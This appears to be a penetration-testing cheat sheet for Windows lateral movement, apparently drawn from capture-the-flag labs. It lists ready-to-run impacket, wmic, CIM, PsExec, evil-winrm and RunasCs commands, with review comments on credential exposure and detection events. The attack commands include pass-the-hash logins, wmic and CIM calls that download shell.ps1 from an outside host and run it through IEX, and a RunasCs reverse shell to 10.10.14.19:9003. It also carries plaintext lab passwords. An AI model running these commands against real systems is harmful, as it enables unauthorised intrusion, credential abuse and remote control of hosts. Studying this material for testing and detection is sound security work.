# Remote command execution over WMI with impacket's wmiexec, authenticating with a plaintext password.
# NOTE(review): a password passed as an argument is visible in the local process list and lands in
# shell history; the credentials throughout these notes appear to be lab values — confirm before reuse.
impacket-wmiexec flight.htb/admin@192.168.50.73 -password 'Frishta123!!!'
# Same login using -hashes LM:NT instead of a password. aad3b435b51404eeaad3b435b51404ee is the
# empty-LM placeholder, so only the NT half authenticates. For NTLM the hash is password-equivalent:
# it stays valid until the account's password is changed.
impacket-wmiexec flight.htb/admin@192.168.50.73 -hashes aad3b435b51404eeaad3b435b51404ee:43bbfc530bab76141b12c8446e30c17c
# Windows-side variant: wmic asks the remote host to create a process (Win32_Process Create).
# The command line fetches shell.ps1 over plain HTTP and hands the text to IEX, so the script is
# neither integrity-checked nor written to disk.
# Detection: on the target the new process is a child of WmiPrvSE.exe (process-creation auditing,
# event 4688, or Sysmon event 1); PowerShell script block logging (event 4104) records what IEX runs.
# wmic itself is deprecated in current Windows releases.
wmic /node:192.168.50.73 /user:frishta /password:Frishta123! process call create "cmd.exe /c powershell -c IEX(New-Object Net.WebClient).DownloadString('http://192.168.49.1/shell.ps1')"
# PowerShell: create a process on a remote host through a CIM session (WMI over DCOM).
# The password is a plaintext literal in the script, so it is exposed to anyone who can read the
# file, the console history or PowerShell logging.
$username = 'cube';
$password = 'Frishta123!';
# -AsPlaintext -Force is required to build a SecureString from a plaintext value; it does not protect the literal above.
$secureString = ConvertTo-SecureString $password -AsPlaintext -Force;
$credential = New-Object System.Management.Automation.PSCredential $username, $secureString;
# Use DCOM for the session instead of the WSMan default.
$options = New-CimSessionOption -Protocol DCOM
$session = New-CimSession -ComputerName 192.168.50.73 -Credential $credential -SessionOption $Options
# Command line for the remote process: downloads shell.ps1 over plain HTTP and passes it to IEX.
# Script block logging (event 4104) on the target records the text that IEX executes.
$command = "IEX(New-Object Net.WebClient).DownloadString('http://192.168.49.1/shell.ps1')"
# Win32_Process.Create starts the process on the remote host; there it runs as a child of WmiPrvSE.exe,
# which is the usual process-creation detection point for WMI-launched commands.
Invoke-CimMethod -CimSession $Session -ClassName Win32_Process -MethodName Create -Arguments @{CommandLine =$Command};
# impacket's psexec: service-based remote execution over SMB, here with a plaintext password on the
# command line (visible in the process list and shell history).
# Detection: this technique normally shows up on the target as a new service install (System log
# event 7045) plus a file written to an administrative share.
impacket-psexec flight.htb/admin@192.168.50.73 -password Nexus123!
# Same tool authenticating with LM:NT hashes; the LM half is the empty-LM placeholder, so the NT hash
# alone acts as the credential until the account's password changes.
impacket-psexec flight.htb/admin@192.168.50.73 -hashes aad3b435b51404eeaad3b435b51404ee:43bbfc530bab76141b12c8446e30c17c
# Sysinternals PsExec run from a Windows host: -i requests an interactive session, -u/-p supply the
# account and password as arguments. By default it installs the PSEXESVC service on the target,
# which also produces a service-install event there.
./PsExec64.exe -i \\CUBE07 -u cube\shaik -p Nexus123! cmd
# WinRM shell with username and password; without -S this uses WinRM over HTTP (default port 5985).
# The password is passed as an argument, so it is visible in the process list and shell history.
evil-winrm -i 192.168.1.34 -u cube -p Frishta123!
# Split a PKCS#12 bundle into its private key and client certificate for certificate-based WinRM auth.
# -nodes writes the private key unencrypted: restrict the file's permissions and delete it after use
# (OpenSSL 3.x spells this option -noenc). The .pfx and the extracted key are credentials in their own right.
openssl pkcs12 -in file.pfx -nocerts -out private.key -nodes
# -clcerts -nokeys writes only the client certificate, no key material.
openssl pkcs12 -in file.pfx -clcerts -nokeys -out certificate.pem
# Certificate login: -c is the public certificate, -k the private key.
# NOTE(review): cert.crt / deauthkey.key are not the file names written by the two openssl commands
# above (certificate.pem / private.key) — presumably from a different run; confirm.
evil-winrm -S -i 10.10.11.152 -u legacyy -c cert.crt -k deauthkey.key
# -S enables SSL, i.e. WinRM over HTTPS (default port 5986).
# impacket's smbexec: remote command execution over SMB through the service control manager, with a
# plaintext password on the command line (visible in the process list and shell history).
# Detection: service-install events (System log event 7045) on the target are the usual indicator
# for this technique.
impacket-smbexec flight.htb/admin@192.168.50.73 -password Nexus123!
RunAs (requires an RDP session on one of the domain-joined machines)
# Built-in runas: starts the program as another user and prompts for the password interactively, so
# the password does not appear on the command line.
# Detection: a logon with explicit credentials is recorded as Security event 4648 on the host.
runas /user:cube cmd.exe
# Same, with a DOMAIN\user account name.
runas /user:tech\cube powershell
# RunasCs (PowerShell wrapper and standalone binary) takes the password as an argument instead of
# prompting, so the credential ends up in the command line, process-creation logs and PowerShell logging.
import-module ./Invoke-RunasCs.ps1
Invoke-RunasCs -Username svc_mssql -Password trustno1 -Command "whoami"
# -r host:port redirects the started process's stdin/stdout/stderr to a remote endpoint; an outbound
# connection from the new process to an unexpected host and port is the network-side indicator.
.\RunasCs.exe c.bum test123 powershell -r 10.10.14.19:9003